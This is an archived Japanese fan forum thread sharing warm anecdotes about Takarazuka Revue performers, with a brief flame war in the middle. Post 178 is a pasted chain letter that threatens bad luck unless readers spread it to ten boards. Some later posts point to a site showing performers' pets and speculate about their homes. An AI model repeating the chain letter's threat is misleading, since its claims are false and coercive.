>>131
まーちゃん、セロームさんコンビは最高だった!w
今も元気に育ってるんだろうか…
確か電気が好物だったよね。

あの、じゅり・キタロウ・まーの組み合わせ自体が何かほのぼのだった。

133 :名無しさん@花束いっぱい。:2007/04/08(日) 11:31:52 ID:kQzk5Em7
>132
洋服屋さんもなごんだ。
ってかウケたww

134 :名無しさん@花束いっぱい。:2007/04/18(水) 11:14:54 ID:L5FqzIM/
去年のスカウトの楽の蘭とむを送る生徒達の図に和むどころか号泣した。

135 :名無しさん@花束いっぱい。:2007/04/28(土) 09:14:30 ID:o8TxZx3J
亀だが>>128タンをみて運動会のビデオを引っ張り出してみた。

大玉ころがしのビデオを物凄い形相で見る(●▽●)にも和んだぞw

他にもいろいろ。
競技の間のインタビューでおささんが
「優勝目指して温泉行くぞー!」と。
普通に聞いていたが後でよく考えると、
温泉目指して優勝するぞじゃないのか?w
すんなり「おーーっ」て応えてる花組子がかわいい


136 :名無しさん@花束いっぱい。:2007/05/10(木) 01:47:01 ID:pWe5HDz4
大玉転がしに夢中なタニ、カワユスw
それを見て笑ってる貴子&水&マリタンに和んだ

大運動会は赤面の波が。
各組出し物はやばかったw

137 :名無しさん@花束いっぱい。:2007/05/19(土) 00:13:09 ID:oBQVJWMT
age

138 :名無しさん@花束いっぱい。:2007/05/26(土) 23:12:07 ID:FeN3BNRR
ある雨の日、5年前と同じ傘で現れたユミコたん…

139 :名無しさん@花束いっぱい。:2007/06/03(日) 10:25:49 ID:HnXnMFdm
>>128
>>136
別に笑ってないし、
;`;:゙;`(;゚;ж;゚; )ブッとかなってなくない?
http://www.youtube.com/watch?v=_MEB6zGgWsE

140 :名無しさん@花束いっぱい。:2007/06/05(火) 22:35:59 ID:u4ny/ksn
>>4今月の歌劇で、とうこがタニの字についてちょっと触れてたなw

141 :名無しさん@花束いっぱい。:2007/06/06(水) 04:19:59 ID:hJLNCDv2
だから、タニちゃんは別館でドリルをさせられてるのねw
(●▽●)φ♪カワユス

142 :名無しさん@花束いっぱい。:2007/06/07(木) 23:13:21 ID:IForBht7
昔、まだじゅりぴょんもミズも月組下級生だった頃、
ダウンタウンの番組のキャラのアホアホマンに名を借りて
アホアホマン1号(じゅり)、2号(さおた?)3号(まほろん?)、4号(ミズ?)
って名前がついてた話がえと文に載ってた記憶があるんだけど
もう一回読みたいなー。何年何月号なんだろ。

143 :名無しさん@花束いっぱい。:2007/06/14(木) 00:49:52 ID:t/vbNjkK
茶会スレ見てたら思い出した、日曜日の涼茶での話

さくらの五月人形のシーン
あかしとしみこが、自分たちの箱からおばけの歌声がきこえると言ってたそうな
あすかちゃんがとうこさんに向かって歌う「戦えば〜♪」てやつが低い声で聞こえると
実はとよこは箱の中で、「一人カラオケボックス」のように
色んな人の歌をくつろぎながら小さくいっしょに歌っていて、
それが隣の箱のあかしたちに聞こえたらしい。
楽屋でかなり話題になってたらしくて、自白したらみんなに「とよこかー!」て言われたんだってさw
涼茶、ちょっと可愛いエピソード多くて和んだ…

長文スマソ


144 :名無しさん@花束いっぱい。:2007/06/20(水) 01:08:42 ID:Dg4jDHUI
良スレ(・∀・)あげ

145 :名無しさん@花束いっぱい。:2007/06/20(水) 23:42:32 ID:NqbmIdOP
ユミコがミズグッズのパスケースご愛用。

146 :名無しさん@花束いっぱい。:2007/06/21(木) 08:58:35 ID:g/F0QjSB
ずーっと前だけど、
ご贔屓がもらったあさこさんからの伝言メモ
おさ会のメモ帳だったよ

147 :名無しさん@花束いっぱい。:2007/06/27(水) 02:59:14 ID:JZScZbd6
age
何か和むネタを!

148 :名無しさん@花束いっぱい。:2007/06/27(水) 23:03:43 ID:abZbOUvS
私も今さらだが、運動会DVDを再チェックしてみた。

障害物競走で、宇海⇒みなみ⇒ことこと⇒ももか…と連続一位ってだけで
★ファンにとっては涙もんだし、
その後のももか、生徒席へウイニングラン⇒出迎えたわたさんとがっつり抱擁…は
今大会屈指の名場面だと思うが、
その後、さらに星組生からの涙のねぎらいを受けるももか、
出迎える みっこ・ケロ・ちぐ・ひか・エレナ・ももこetc…と追った末に
カメラが写したのは生徒席後方でもらい泣きしてるオギー。

見間違いだったらスマソ、でもオギーが涙ぬぐってるように見えるんだもん。

149 :名無しさん@花束いっぱい。:2007/06/28(木) 11:35:08 ID:UuHEnCu6
>>148
まじで…! オギーかわいいな!
あとで見てみよう

運動会の障害物競走はいつ見ても笑……感動するw
走り終わったあとの泣いてるみなみを見てちょっと笑っちゃうおっちょんとか
テンションおかしい(インタビューになってない)まりえちゃんとか
直行で男らしく応援席まで走ってわたさんに抱き上げられるももかとか

あーほんと笑える…
いつもこの場面はハライテーになる

150 :名無しさん@花束いっぱい。:2007/06/28(木) 15:59:56 ID:+aDqeeyd
るいるいの竜馬伝ムラのお茶会のときに芝居からショーへのお化粧替えの話になって・・・

「あの〜化粧換えをどうしようかなと思って、
まゆげだけを書き直すとか、赤いのを上から消す・・・消そうかなと思っていたんですけど・・・
あの〜貴城さんに・・・『そんなことしたら、オイル持って追っかけるよ!』って、
ちゃんと化粧換えをしないといけないということになって『はい、します。』といって・・・」

ほぼ原文のままです・・・
それを実際にやっている姿が頭の中に出て聞いたときにほのぼのしてしまいました。

151 :名無しさん@花束いっぱい。:2007/06/28(木) 19:07:44 ID:sB3xqtC/
るいるいカワユス

152 :名無しさん@花束いっぱい。:2007/06/29(金) 09:35:01 ID:iJ6J0QFJ
>>149
おっちょん?

153 :名無しさん@花束いっぱい。:2007/06/29(金) 10:18:29 ID:Odt8sUrg
>152
司会してたおっちょんのことでしょ?

154 :名無しさん@花束いっぱい。:2007/06/29(金) 13:18:41 ID:iJ6J0QFJ
>>153
ああ、d

155 :名無しさん@花束いっぱい。:2007/07/16(月) 12:29:57 ID:CLlSAbVL
age♪

156 :名無しさん@花束いっぱい。:2007/07/16(月) 16:07:12 ID:khrvTAI+
それってどうなのの最後のコメントでのとなみちゃんの斜めな前髪´∀`

157 :名無しさん@花束いっぱい。:2007/07/16(月) 20:21:51 ID:TnvAJbXA
>150
かしるい・゚.・(ノД`)・.゚・

158 :名無しさん@花束いっぱい。:2007/08/06(月) 23:47:53 ID:vbmLBhna
>150
>157
かしげラストデイの、
三角おにぎり(るい)俵おにぎり(タニ)丸おにぎり(蘭トム)の中から
どれを選ぶ?ってところ…
「え〜っ」と一瞬困ってから
「迷っちゃいけないよね…るいちゃん、おいで」って言った時の
かしちゃんの優し〜い声とるいちゃんの嬉しそうな笑顔が
本当にほっこりさせられて見てるこっちも嬉しくなった。
ジェンヌさん流の演出かもしれないけど、それでもいいよ。
幸せな気持ちにさせてくれてありがとう、かしるい。


159 :名無しさん@花束いっぱい。:2007/08/09(木) 00:03:17 ID:HDb0WnUd
花ハロダン
真っ先にスタンディングしたまとぶとみわっちが
後ろのお客さんに「すいません」と謝っててほっこりした。

160 :名無しさん@花束いっぱい。:2007/08/31(金) 18:12:31 ID:LZkmsLVU
良スレage

161 :名無しさん@花束いっぱい。:2007/09/03(月) 13:44:14 ID:VuCjw5hf
ほのぼのage

162 :名無しさん@花束いっぱい。:2007/09/03(月) 17:02:14 ID:U6NfviJm
向うを追い出された。
ゆみこネタ頼む。

163 :名無しさん@花束いっぱい。:2007/09/03(月) 17:31:52 ID:GsRDeUij
とりあえず名言スレからコピペ↓

ゆみこネタ、トークショーとかエリザ関連より。

Q「シシィの居室の場面のトートは、背後からスッと現れるのに
ドアから普通に出て行くのは何故!?」(会場爆笑)

「ここはみなさん笑う所じゃないんですよ!
スッと現れたりっていうのは不思議なパワーがいるけど、
シシィに拒絶されたショックで心が人間っぽくなっちゃって
『ハァ〜・・・カチャ、・・・パタン。(←小芝居付き)』って感じなんですよ!
私の解釈では。」


Qフランツは結局ドアを開けてもらえるんでしたっけ?

「一瞬開くんですけど、すぐ閉められちゃうんですよね〜。
『カチャカチャ、ハッ!足入れとけば良かった!!』(←やっぱり小芝居付き)みたいなねw」


Q鏡の間のシシィを見ている時は、どんな気持ちですか?

「『うちの嫁さん綺麗やなー』と思って見てます」

164 :名無しさん@花束いっぱい。:2007/09/03(月) 18:06:32 ID:TXsS+L5I
どこがほのぼの?
単にお茶会の面白発言書いてるだけじゃん。
名言スレの方が向いてるんじゃないの?

165 :名無しさん@花束いっぱい。:2007/09/03(月) 18:23:38 ID:mvMsyr/+
カッパスレでも作ってそこで延々やってろよ!
ネット活動だけは派手なんだな。
たまには空気嫁!

166 :名無しさん@花束いっぱい。:2007/09/03(月) 19:49:56 ID:yGTmv1lt
>164
名言・迷言スレで
「スレチ」だって追い出された人達だお

167 :名無しさん@花束いっぱい。:2007/09/03(月) 21:56:20 ID:CjZ7tDIX
ほのぼのしましたよん〜

168 :名無しさん@花束いっぱい。:2007/09/03(月) 22:02:59 ID:wQTN96z4
うーん、歌ウマー(゚Д゚)スレでおさゆみ厨鬱陶しいといったら今度は
名言・迷言スレに行って、あっちでもウザいといわれたらこっちか…
別館行き給え

169 :名無しさん@花束いっぱい。:2007/09/03(月) 23:32:03 ID:/Fux2WDN
>162-168
なるほどね。今朝からのはゆみこアンチが頑張ってたのか。
さすがにここまでやったら自演まるだしでバレバレだよ。
やりすぎちゃったねw


170 :名無しさん@花束いっぱい。:2007/09/03(月) 23:40:20 ID:yGTmv1lt
>169
今度はこっちで喧嘩吹っかけて揉めさす魂胆か?

171 :名無しさん@花束いっぱい。:2007/09/03(月) 23:44:14 ID:R3wVJa0W
>170
スレタイ読めますか?
本当にもういい加減にしてくれないかな。

172 :名無しさん@花束いっぱい。:2007/09/03(月) 23:47:37 ID:qm5lEh0f
この場合、169にも注意するべきだろうよ。

173 :名無しさん@花束いっぱい。:2007/09/03(月) 23:53:47 ID:/NQjy9hu
珍しく上に来てると思ったら┐(´ー`)┌
169はそれ以上に不穏当なモメサに注意してるんじゃないの。

174 :名無しさん@花束いっぱい。:2007/09/04(火) 00:08:42 ID:JCmgbhyt
アンチもゆみヲタもいい加減にしてくれよ。
誰だよ、ここに誘導したバカはorz

175 :名無しさん@花束いっぱい。:2007/09/04(火) 00:10:53 ID:vPMkQbLR
同意
どっちもウザイ


176 :名無しさん@花束いっぱい。:2007/09/04(火) 00:21:20 ID:j28wjerH
つーかほのぼのスレにアンチが来ること自体間違ってる。

177 :名無しさん@花束いっぱい。:2007/09/04(火) 00:30:03 ID:F86Ei9wO
誰かさんがageてから、このスレがこのスレらしくなくなってしまった。
進行遅杉だし沈みがちだけど、良スレで好きだったのにな…。
>>95みたいなスレチにも、>>96とか>>98みたいなレスがつくスレだったのに。

沈むまでしばらく待って、ほのぼのマターリいきましょう。

178 :名無しさん@花束いっぱい。:2007/09/08(土) 03:03:45 ID:iHyTQHjj
これはアメリカのゲームです。1度やってみてください。
これは、たった3分でできるゲームです。試してみてください。 驚く結果をご覧いただけます。
このゲームを考えた本人は、メールを読んでからたった10分で願い事が
かなったそうです。このゲームは、おもしろく、かつ、あっと驚く結果を 貴方にもたらすでしょう。
約束してください。絶対に先を読まず、1行ずつ進む事。 たった3分ですから、ためす価値ありです。
まず、ペンと、紙をご用意下さい。 先を読むと、願い事が叶わなくなります。
@まず、1番から、11番まで、縦に数字を書いてください。
A1番と2番の横に好きな3〜7の数字をそれぞれお書き下さい。
B3番と7番の横に知っている人の名前をお書き下さい。(必ず、興味の
ある性別名前を書く事。男なら女の人、女なら男の人、ゲイなら同姓の名
前をかく)
必ず、1行ずつ進んでください。先を読むと、なにもかもなくなります。
C4,5,6番の横それぞれに、自分の知っている人の名前をお書き下さ
い。これは、家族の人でも知り合いや、友人、誰でも結構です。
まだ、先を見てはいけませんよ!!
D8、9、10、11番の横に、歌のタイトルをお書き下さい。
E最後にお願い事をして下さい。さて、ゲームの解説です。
1)このゲームの事を、2番に書いた数字の人に伝えて下さい。
2)3番に書いた人は貴方の愛する人です。
3)7番に書いた人は、好きだけれど叶わぬ恋の相手です。
4)4番に書いた人は、貴方がとても大切に思う人です。
5)5番に書いた人は、貴方の事をとても良く理解してくれる相手です。
6)6番に書いた人は、貴方に幸運をもたらしてくれる人です。
7)8番に書いた歌は、3番に書いた人を表す歌。
8)9番に書いた歌は、7番に書いた人を表す歌。
9)10番に書いた歌は、貴方の心の中を表す歌。
10)そして、11番に書いた歌は、貴方の人生を表す歌です。
この書き込みを読んでから、1時間以内に10個の掲示板にこの書き込みをコピーして貼って下さい。
そうすれば、あなたの願い事は叶うでしょう。もし、貼らなければ、願い事を逆のことが起こるでしょう。とても奇妙ですが当たってませんか?


179 :名無しさん@花束いっぱい。:2007/12/03(月) 01:56:42 ID:9walASI2
おささんが、りらっくまが好きと聞いて・・・
想像つかないんだけど。

180 :名無しさん@花束いっぱい。:2007/12/09(日) 08:25:39 ID:S6iI6vnp
オサとりらっくま…案外似合うようなww
水はカピバラさんだっけw

181 :名無しさん@花束いっぱい。:2007/12/22(土) 22:40:31 ID:oLFrobTd
カピパラさんカワイイ!!

182 :名無しさん@花束いっぱい。:2008/01/15(火) 04:02:50 ID:Ii6B/EiK
ほのぼの期待age

183 :名無しさん@花束いっぱい。:2008/01/15(火) 04:56:27 ID:FATCWjwp
ともちんはポムポムプリンが大好きだ

184 :名無しさん@花束いっぱい。:2008/01/15(火) 07:37:10 ID:aZd5DpVG
まさこはリラックマが大好きだ

185 :名無しさん@花束いっぱい。:2008/01/15(火) 08:47:23 ID:ocHRzqYV
あかしもポムポムプリンとシナモロールが好きだ

186 :名無しさん@花束いっぱい。:2008/01/19(土) 21:34:48 ID:QUQuiVfW
アレックス青年館千秋楽

楽屋入りするマチオ先輩、いつものようにお手紙を受け取ろうと歩いてきたが、
何とファンが1人も待っていない!

まだマチオ先輩が来ないと思って待機場所で控えていたファンを
慌てて呼びに行くスタッフ。

代表さん思わずため息混じりにぼそっと「楽なのに…orz」

その一言に慌てふためくマチオ先輩。
いつもより更に動きがおかしなことになって、
でも笑顔で楽屋に入っていくマチオ先輩は何だか無性に可愛かった。


187 :名無しさん@花束いっぱい。:2008/01/27(日) 17:54:17 ID:veZqvY6n
ちょwwwこのスレタイwww
某板のコテ思い出したwww
ナツカシス

188 :名無しさん@花束いっぱい。:2008/02/07(木) 07:50:51 ID:7QPD2Ohb
>186
まちお先輩にいつもお手紙を渡すファンがいるのか?
そっちの方が意外だ。

189 :名無しさん@花束いっぱい。:2008/02/12(火) 21:41:16 ID:+x8v72hk
知人が越リュウファン。
越リュウがデパートの屋上にあるようなあんぱんまん列車に乗ってる写真を見せてもらった。
案外カワユス(*´д`*)

190 :名無しさん@花束いっぱい。:2008/02/13(水) 21:51:57 ID:1oRkjlnp
>>189
み・・・見たい!!

191 :名無しさん@花束いっぱい。:2008/02/20(水) 09:01:16 ID:0JMzYzhm
青年館の出待ち

通路の両側に座ったファンからお手紙を受け取るゆみこさん
左側のファンから「ありがとうございます!ありがとうございます!」と
お礼を言いながらずーっと受け取っていって終わりまで来たら
ダーーーッ!と右側の列の先頭にダッシュで走ってきて
はーはーしながら「ありあとーざいます!」(もう口が回ってない)とお手紙受け取って、
また終わりまで来たらダーーーッ!と通路の先頭に走って観劇のお礼を述べていった。

ほんまにいい人やなぁ〜
贔屓は他にいるけどファンになっちったよ。

192 :名無しさん@花束いっぱい。:2008/02/20(水) 11:43:21 ID:EmZ4WqP0
越リュもゆみこもカワユス(*´д`)ハァハァ
なごむw

193 :名無しさん@花束いっぱい。:2008/02/26(火) 17:56:00 ID:A1JM5owz
中日千秋楽、
ショーの客席降りで手を振るまとぶんに
振り返すお客さん。
ディズニーランドのパレードの
ミッキーと子供達の構図に似てるとオモタ
お手振りであんだけ盛り上がるとは…
あったかい客席だったよ

194 :名無しさん@花束いっぱい。:2008/03/15(土) 09:27:31 ID:VbWK19XJ
ARexの出待ち、クリスマスイブの出来事。
あさことまさおのトナカイコスプレやら、赤と白の組み合わせの服にサンタ帽をかぶったサンタ風かなみんやらに湧く出待ちの人々。
そこへサンタ帽をかぶったきりやん登場、服は普通なんだがマフラーの首もとの部分からちらちら何かが見えている。
自分は霧矢会の後ろにいただけだったのでなんだろーとは思ったがぼんやり見ていた。
ただ、きりやんは凄くそれに気づいて欲しそうではあったw
しかし気づいてるのか普通に気づいていないのかスルーな霧矢会の人々。そしてちょっといたたまれなくなってくるきりやんwww
自分から見て列の向こう端まで行った所できりやんが、さっきからいじっていたそれを首もとから取って列に投げていた。
どうやら蛇のおもちゃだったみたいだ。暗かったせいか若干トカゲに見えたのは多分気のせいだと思う。
しかしあの『誰か気づいてくれないかな〜』な顔をした突っ込み待ちとも取れるきりやんはかなり可愛かった。
ディオ様が一気に愛しくなったよ。

今更過ぎな話だが、出待ち話を読んで思い出したので書いてみる

195 :名無しさん@花束いっぱい。:2008/03/22(土) 17:24:15 ID:fC9zCGAF
aゲ

196 :名無しさん@花束いっぱい。:2008/03/22(土) 19:49:57 ID:4Yj+p/ia


197 :名無しさん@花束いっぱい。:2008/03/23(日) 10:56:03 ID:/tenL/A7
こんなスレあったんだ。
先日DCで 開演前にスカピンのチラシをキャッキャ言いながら回覧してる宙組下級生に和んだ。

198 :名無しさん@花束いっぱい。:2008/04/29(火) 21:50:58 ID:W2YgRXjd
あげー

199 :名無しさん@花束いっぱい。:2008/05/22(木) 00:15:06 ID:lsbEDBMa
最近ぎすぎすしてる気がするのでたまにはほのぼのしようよ
ということでageます。

200 :名無しさん@花束いっぱい。:2008/05/22(木) 12:54:40 ID:HPKpPnvd
君愛の時かな?
入り待ちのギャラリーしてたら、
となみがファンからシナモンロールのポーチを受け取っていた。
ニコニコしながら顔の高さに持ち上げて一言。

「そっくり?」

丸さと目の離れ具合と可愛さが、確かに似ていた…w

201 :名無しさん@花束いっぱい。:2008/05/22(木) 13:50:21 ID:pGQtWr08
となみかわええ〜

202 :名無しさん@花束いっぱい。:2008/05/22(木) 21:01:19 ID:Y2PS8AVm
確かに似てるなw

203 :名無しさん@花束いっぱい。:2008/05/22(木) 21:03:01 ID:J0YVDVfg
となみかわいい…!!!

204 :名無しさん@花束いっぱい。:2008/05/22(木) 23:16:32 ID:j0Sj151p
となみのえと文の写真思い出したwビニールボールに目とか口とか
張りつけて、一緒に写ってるやつw
一緒に作ってくれた研1さんが、「となみさん、目の位置はもっと
外側です!」って言ったとか。その研1の名前は書いてなかったけど
きゃびぃの代だと知ってから、きゃびぃだと確信しているw

205 :名無しさん@花束いっぱい。:2008/06/03(火) 23:52:00 ID:5qicsmZv
ほのぼの

206 :名無しさん@花束いっぱい。:2008/06/14(土) 18:27:06 ID:Yu6cdRfh
ほのぼの話読みたいage

とよこのブリドリパーソナルで
まひるちゃんと涙ながらに手紙を読んでてすげー二人だけの世界だなーとか思った。

207 :名無しさん@花束いっぱい。:2008/06/14(土) 20:14:07 ID:7hpBBAAF
大劇場の楽屋、上級生の小部屋で上四人の次の部屋、
ゆひさん以下6人、えり姐さん紅一点で、以下まりん、ゆう、えり、みわ。
仲良しらしいからいいんだが…
いや、この面子の仲良しって凄いかも、
と、ちょっとオモタ
喧しそう orz

208 :名無しさん@花束いっぱい。:2008/06/15(日) 15:51:30 ID:KOT6Dmh2
あれ?
えりたんが大部屋の長じゃなかった?

209 :名無しさん@花束いっぱい。:2008/06/15(日) 19:26:59 ID:Yon46rb6
この公演の大部屋の長はゆひさんだよ。
東宝はわからないけど。

210 :名無しさん@花束いっぱい。:2008/06/16(月) 20:40:50 ID:XI/+u9oI
おさは子供の頃、お兄ちゃんたちとチャリンコ暴走族やってたってレスみかけてわろた
本当かどうか知らないけど和んだ

211 :名無しさん@花束いっぱい。:2008/06/22(日) 04:09:00 ID:PwEsUNZT
ε ⌒ヘ⌒ヽフ
(  ( ・ω・) ほのぼの
し ー し─J


212 :名無しさん@花束いっぱい。:2008/06/22(日) 11:15:49 ID:iNObDfXy
>>49
いつの対談ですか!?

213 :名無しさん@花束いっぱい。:2008/06/23(月) 17:00:39 ID:LQs1qCjB
去年、東宝花組で入りの時、
クルマから降りたまとぶんと
反対から歩いてきたまりんが
鉢合わせ。
遠慮がちに手を振ったまとぶんと
(ファンの前だったからかな?)
なぜか固まってたまりんが
びみょ〜におかしかった
おいおい、同期ダロ

214 :名無しさん@花束いっぱい。:2008/06/23(月) 23:50:52 ID:86GiEYRj
きりやんのフィンチが遊びに来たソノカのリスの新助を食べそうになった

215 :名無しさん@花束いっぱい。:2008/06/24(火) 00:46:35 ID:rOyi+BdU
君愛でほのぼのカップル(というか兄妹みたいな感じ)だったひろみとシナ。
楽直前のある日、二人で手をつないで楽屋出してきた。
シナが照れまくっててすげーカワユスだった。

ひろみ「今日は、シナがひろみと出ようかな〜って言うから、一緒に出てきました」
シナ「え、なんか嫌そうw」
ひろみ「嫌じゃないよ別にww」

とファンの前でしゃべっててメチャメチャかわいかった〜

216 :名無しさん@花束いっぱい。:2008/06/24(火) 21:37:15 ID:OZmN4ctK
>>214
マジかよwwwwww

217 :名無しさん@花束いっぱい。:2008/06/25(水) 20:43:13 ID:6Sey4InO
>>214
ほのぼのじゃないよー!!

218 :名無しさん@花束いっぱい。:2008/06/26(木) 17:28:33 ID:5PJG9Jf5
>>214
きりやんは「食べようとはしてません。そんなフィンチが凶暴みたいに!」と怒ってたぞw
ただ異常に興味を示しただけだそうだ。

しんすけ連れてきりやんちに行く園加はほのぼのだw

219 :名無しさん@花束いっぱい。:2008/06/26(木) 18:54:54 ID:+Kw9vTB7
>>215
シナぁ……(´;ω;`)

220 :名無しさん@花束いっぱい。:2008/06/26(木) 19:09:23 ID:x1wuTekf
>>218
よっぽどしんすけを自慢したかったんだろうなw

221 :名無しさん@花束いっぱい。:2008/06/26(木) 22:24:18 ID:bN1gIP0c
>>215
シナかわいいよかわいいよ

222 :名無しさん@花束いっぱい。:2008/06/27(金) 06:36:12 ID:KaA+Vjgr
随分昔だけど85期が予科の頃、受験スクールのよしみで食を共にしました。
私がお店の扉を開けようとしたら、予科生がダーッ!と走って来て、素早く扉を開けてくれました。
何だか嬉しかったな。

223 :名無しさん@花束いっぱい。:2008/06/27(金) 09:41:40 ID:+0+dgHBo
>>222
条件反射!?ワロスww

224 :名無しさん@花束いっぱい。:2008/06/27(金) 19:02:44 ID:hN25WLI7
どこに書いていいか分からなかったんだけど
フレブルサイトにフィンチ、ブランシュがいるんだけど・・
因みに下のほう
ttp://www.zaihoo.jp/friends.htm

225 :名無しさん@花束いっぱい。:2008/06/27(金) 20:23:57 ID:nqHmy5pl
>>222
吹いたwwwww

226 :名無しさん@花束いっぱい。:2008/06/27(金) 22:12:42 ID:8gguqKu+
>>224
ほんとだ〜w
でも本人(本犬)じゃないよね?たまたま名前が同じなんだよね?

227 :名無しさん@花束いっぱい。:2008/06/27(金) 22:30:21 ID:siDjI8kh
本犬。グラフと見比べてみよう。

しかし、トイレシートと自宅晒すとはチャレンジャーなw

228 :名無しさん@花束いっぱい。:2008/06/27(金) 23:08:25 ID:8gguqKu+
うわ!本犬なんだ。びっくり〜!
二人ともここの洋服の常連さんなのか。
きっと楽屋でバカ親っぷり全開なんだろうなw

「夏の新作すごいエエのん出てましたよね?」
「もう注文済み〜」
「うわっ早っ!急がな」
「かぶらんといてね〜」
「ええ〜ええやないですか〜オソロでも〜」

そういえば、しんすけ食われかけ事件の時ソノカ完全に半泣き状態だったらすいw

229 :名無しさん@花束いっぱい。:2008/06/28(土) 22:46:32 ID:DPbakiP6
きも

230 :名無しさん@花束いっぱい。:2008/06/29(日) 11:33:07 ID:2T4Wyz35
もうペットデレデレジェンヌはお茶会でペット持込OKにしたら
そしたらファンも本人も楽しいだろう。

231 :名無しさん@花束いっぱい。:2008/06/29(日) 12:38:53 ID:cWxciJsw
本人の気持ちのベクトルがファンから逸れまくると思うが

232 :名無しさん@花束いっぱい。:2008/06/30(月) 03:16:45 ID:Ee30fhVa
>>224
よく見つけたね!
あさこもきりやんも親ばかすぎだろ

233 :名無しさん@花束いっぱい。:2008/06/30(月) 04:04:30 ID:GPB9D1YO
2人でオソロ買って犬見せたいだけで投稿したのか!
あいつらほんまに親ばかだなw

ネームバリューを活かして写真を送れば見返りありそうなのに。


234 :名無しさん@花束いっぱい。:2008/06/30(月) 04:07:07 ID:GPB9D1YO
しかし>>224すごい。
もしや店の人?

235 :名無しさん@花束いっぱい。:2008/06/30(月) 10:56:51 ID:NMvM5hl9
あさこさんパソコン使えないからきりやん主導で行動したと予想!
でもキャキャして写真とってたかと思うとなごやかですね

236 :名無しさん@花束いっぱい。:2008/06/30(月) 10:57:30 ID:EWTi34Tn
ちえちゃんも犬バカ
犬の服にいちいち名前つけてるらしい
ちえ痛いよちえ

237 :名無しさん@花束いっぱい。:2008/06/30(月) 12:00:30 ID:sf1igPLD
名言スレからの引用だけど、

犬を飼うことだけはしない。独身女性で犬を飼ったら終わり。
愛犬にばっかり愛情を注いでる人がいるけどますます機会がなくなりそう
by じゅりぴょん(勝ち組女)

おいおいと思ったと同時に、幸せなんだなーとほのぼのしたというか…

238 :名無しさん@花束いっぱい。:2008/07/01(火) 20:00:52 ID:SO2b4c95
じゅりさん、そんなこと言ったんだ。
じゅりさんには男役トップスターになるよりも今の生活の方が幸せなんだね。
人事で損をしてかわいそうだと思ってたから、なんだかホッとしたよ。

239 :名無しさん@花束いっぱい。:2008/07/01(火) 23:00:45 ID:MAMQQYEy
もともと、どう間違ってもトップになるような人じゃなかったわけだが…
あれで「損をした」とは、どういう意味なのか理解できないな

240 :名無しさん@花束いっぱい。:2008/07/02(水) 19:41:21 ID:f/0dzNky
いいかげんスレチ

241 :名無しさん@花束いっぱい。:2008/07/03(木) 00:07:52 ID:hnEhHH7X
犬に愛情を注いで自分の男にも愛されてるジェンヌが好きだ。
でも犬に愛情を注いで男に興味を示さないジェンヌはもっと好きだ・・・。

じゅりぴょんごめんよ、ヅカオタはこんなもんです
そしてスレチ引きずってすまぬ
久々の観劇が今週末で話題転換になるネタが無い・・

242 :名無しさん@花束いっぱい。:2008/07/03(木) 00:16:05 ID:hutTtPoI
じゃあ花スレから拾ってきたネタを。
花組主要メンバーが星組観劇したときの話。

883 :名無しさん@花束いっぱい。 :2008/07/02(水) 14:29:12 ID:gZ1n8SiK
今更だけどトプコンビ、2.3.4+まりんの観劇目撃情報
まりんまでとえりみわで別れて座ってたけど
両方ともお客さんが間違えて自分達の席に座ってて
立ち往生したらしい。
特にトピコンビ、ゆひまりんの方は
彩音がチケット取り出して確認したり
彩音、まりんが係りの人を呼びに行こうとするのを
まとゆひが止めたりと
係りの人が気づいて慌ててやってくるまで
結構な時間立ってたって。

えりみわは出る時にみわっちがえりたんの裾を直そうと
裾持ったまま歩いたり、二人で楽しそうに話ながら出ってとな。

887 :名無しさん@花束いっぱい。 :2008/07/02(水) 15:45:41 ID:o+Q+3cd9
彩音がおねーさんを呼びに行こうとした時はまとゆひが
まりんが呼びに行こうとした時はゆーひがとめてたよ。
待ってる間、まとぶんがゆーひに何回か話し掛けてた。
やっと座れるようになったらゆーひが後ろのえりたんに
笑いながら話し掛けてた。

劇場から出る時は全員ちゃんと学年順w
後ろのえりみわが話に夢中になるから
まりんとの間にどんどんお客さんが入っちゃって
だんだんと離れて行くさまがなんとも…。
一番後ろの彩音はさぞや焦ったことだろうw

243 :名無しさん@花束いっぱい。:2008/07/13(日) 16:39:20 ID:cSN204vs
ゆひまとえりと組替えメンバーと
生え抜きメンバーと仲良しなのがなにより
うれしい


244 :名無しさん@花束いっぱい。:2008/07/28(月) 08:05:49 ID:TlPhHL8D
ポーニョポーニョポニョさかなのこ

245 :名無しさん@花束いっぱい。:2008/08/11(月) 07:25:56 ID:rPsgrR5R
今月号の歌劇より。
Wii Fitのフラフープをやってる京さん。なんか意外だけど可愛いw

57 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)